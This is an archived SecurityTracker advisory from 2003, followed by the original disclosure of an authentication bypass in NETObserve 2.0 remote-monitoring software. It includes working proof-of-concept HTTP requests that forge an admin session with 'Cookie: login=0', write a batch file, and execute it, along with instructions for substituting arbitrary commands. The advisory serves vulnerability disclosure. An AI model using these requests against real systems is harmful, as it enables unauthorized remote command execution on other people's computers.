SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   NETObserve Vendors:   ExploreAnywhere Software
NETObserve Authentication Hole Lets Remote Users Execute OS Commands
SecurityTracker Alert ID:  1008574
SecurityTracker URL:  http://securitytracker.com/id/1008574
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 30 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0 and prior
Description:   Peter Winter-Smith reported a vulnerability in NETObserve. A remote user can execute commands on the target system in certain cases.

It is reported that a remote user can connect to the target system using a specially crafted HTTP header to hijack an administrator's session. A demonstration exploit header line is provided:

Cookie: login=0

A remote user can then execute arbitrary commands on the target system. Some demonstration command execution exploit examples are provided in the Source Message.

Impact:   A remote user can execute arbitrary operating system commands on the target system in certain cases.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exploreanywhere.com/no-intro.php (Links to External Site)
Cause:   Authentication error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  NetObserve Security Bypass Vulnerability


NetObserve Security Bypass Vulnerability

########################################

Credit:
Author     : Peter Winter-Smith

Software:
Packages   : NetObserve
Version    : 2.0 and prior
Vendor     : ExploreAnywhere Software
Vendor Url : http://www.exploreanywhere.com/no-intro.php

Vulnerability:
Bug Type   : Security Bypass
Severity   : Highly Critical
              + Remote System Command Via NetObserve


1. Description of Software

"NETObserve is your all in one solution to monitoring spouses, co-workers,
children, employee's and just about any other person you may concerned of
that is using your PC! NETObserve will monitor not only what is going on
within your PC, but it can also record what is going on in front of your
PC, through the use of our breakthrough web cam surveillance technology!
With NETObserve on your side, you will have remote, realtime access to
your PC, allowing you to remotely control and monitor a PC while you are
away! Read on to find out why NETObserve is leading the way in the cutting
edge industry of PC monitoring, surveillance, and administration!"
- Vendor's Description


2. Bug Information

(a). Security Bypass

NetObserve is extremely persistant when trying to ensure that any remote
user issuing commands to the server is properly authenticated. It seems
that even if the remote administrator closes his or her browser they are
required to login again before they can gain control of the remote system.

Once a legitimate session with an administrator has been established, the
browser confirms that the commands which the remote user is issuing are
allowed to be performed on the remote system by sending a special HTTP
header to the NetObserve server.

The only problem with this is the fact that any remote user can attach the
special header directly to their own specially crafted request, and
NetObserve blindly believes that a session with an administrator was
already in progress.

The special header in question is nothing more than 'Cookie: login=0'!


3. Proof of Concept Code

The following two HTTP requests will execute commands via the windows
command interpreter on the remote system:

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------

To change the commands to be run, just alter the 'Content-Length' of the
first request to be the length of the line of commands, including the
string 'newfiledata='.
Then alter the data being posted under 'newfiledata', remembering to
replace spaces with '+' and encode any common HTTP characters, like '/'
as hexadecimal values, '%2F' in this instance.

These specific requests sent unaltered will execute the windows
calculator.


4. Patches - Workarounds

No fixes are available at the time of writing. It it suggested that you
use a different, more secure remote administration software package until
a patch is released.


5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.


o This document should be mirrored at:
    - http://www.elitehaven.net/netobserve.txt

_________________________________________________________________
Find a cheaper internet access deal - choose one to suit you.
http://www.msn.co.uk/internetaccess



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC